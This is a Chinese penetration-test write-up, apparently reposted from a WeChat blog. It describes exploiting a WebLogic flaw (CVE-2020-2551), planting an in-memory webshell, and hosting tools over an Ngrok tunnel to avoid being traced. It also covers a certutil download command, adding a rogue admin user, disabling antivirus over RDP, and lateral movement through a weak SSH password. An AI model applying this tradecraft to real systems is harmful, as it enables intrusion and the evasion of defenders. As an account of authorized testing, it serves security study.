免责声明:文章来源于真实渗透测试,已获得授权,且关键信息已经打码处理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
前言
主要记录一次获取高权限用户的shell后如何直面杀毒软件上传工具,并继续进行内网信息收集和横向工作,从而进一步扩大战果的实战记录。也推荐一下在本文中使用到的一个反向代理工具 —— Ngrok,文中我利用该工具在没有使用肉机和VPS的情况下便完成了本次渗透测试工作。
一、漏洞利用
信息收集的时候发现隐藏的资产,进行指纹识别使用了Weblogic中间件。随便访问一个不存在的目录,产生报错,很明显Weblogic的特征,直接上工具扫描漏洞。
运气也是相当好的,确实存在漏洞(CVE_2020_2551),并且获取的是Administrator的用户权限。
继续利用工具写入内存马,通过哥斯拉进行控制,成功连接webshell。
二、Ngrok工具
拿到webshell后,我便想尝试利用shell下载内网信息收集工具从而继续进行渗透工作。这里就用到了我说的 Ngrok 工具。这是一个反向代理工具,它能够创建一个安全的隧道,将本地服务器映射到互联网上。
先利用Python在存放内网工具的目录下启动HTTP服务器,记得要确保HTTP服务器开启了目录浏览功能
接着,就是利用 Ngrok 工具将内网的HTTP服务映射出去,而映射的端口就是刚刚Python启动HTTP服务的端口。命令也是很简单,输入后直接回车就能成功将本地的HTTP服务映射出去,并且获取了一个临时的域名。
而且因为是临时的域名,关闭工具和服务后域名也就没有了,这也就使得防守方难以通过域名进行溯源。
直接访问临时域名就可以浏览目录内容了,如果访问下载目录内工具,在命令终端也会显示信息,可以由此看出是否成功下载。(Ngrok 工具初次使用时是需要进行配置的,配置之后就可以像文中步骤一样使用,建议大家自行查询一下 Ngrok 使用方法)
三、直面杀毒软件
尝试利用curl或wget下载信息收集工具,但是测试发现该系统没有curl和wget这两个工具。这时我就想到了windows中的另一个默认自带的工具 —— certutil ,本来该工具是用来处理与证书相关的操作的,但是利用特殊的命令一样能起到下载文件的作用。
certutil -urlcache -f -split http://.....
可以看到我确实成功下载了 fscan 工具,但是一运行就报错。查看后发现fscan没了,这服务器肯定是有杀软的,而工具做了静态免杀。懒得再搞免杀绕过了,既然是Administrator用户,那直接远程连接到桌面关掉杀软就好了。
利用命令行添加 test 用户,并将该用户加入到管理员组中。
查看端口开放情况发现开放了3389,那就不用再开启RDP服务了。直接利用哥斯拉插件写入Suo5内存马,利用工具搭建正向代理。
确认正向代理搭建成功后,直接用远程桌面连接工具连接内网地址进行登录,成功登录到刚刚创建的test用户。
在登录后,直接手动关闭杀毒软件,并再次上传工具。这次就没有问题了,工具成功上传,也没有再被杀掉。
四、内网横向
利用fscan扫描内网,分析发现应该是一个内网小集群。机器不是很多,但也依然发现了不少有用的信息。通过fscan的扫描获取到了一台服务器的SSH弱口令;同时,内网中也存在另一台同样使用了Weblogic中间件的服务器。
利用SSH弱口令远程登录到服务器,成功获得root用户权限。通过查看.bash_history文件,发现该服务器通过防火墙开放了1521端口,猜测该服务器上可能存在Oracle数据库,可惜因为网络和时间问题没有继续进行测试。
使用漏洞利用工具对新发现的存在Weblogic中间件的服务器进行扫描,也是存在一个Weblogic的低版本漏洞,并成功获得Administrator用户权限。
总结
成功获取了两台Windows主机的Administrator用户权限,一台Linux主机的root用户权限。
本次渗透到是没有什么难度,但在这个过程中也是出现了一些问题。在搭建正向代理后,习惯性利用ping进行网络连通性测试,但是就是一直ping不通该服务器的内网IP地址,这一度让我以为根本没有代理成功。但是经过多次测试后,发现是服务器防火墙策略禁ping了,也是第一次在实际的渗透测试内网环境中遇到这种情况。还是那个话,还是需要多实战,多思考。
原文始发于微信公众号(网安日记本):渗透测试实战—高权限shell碰上杀毒软件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论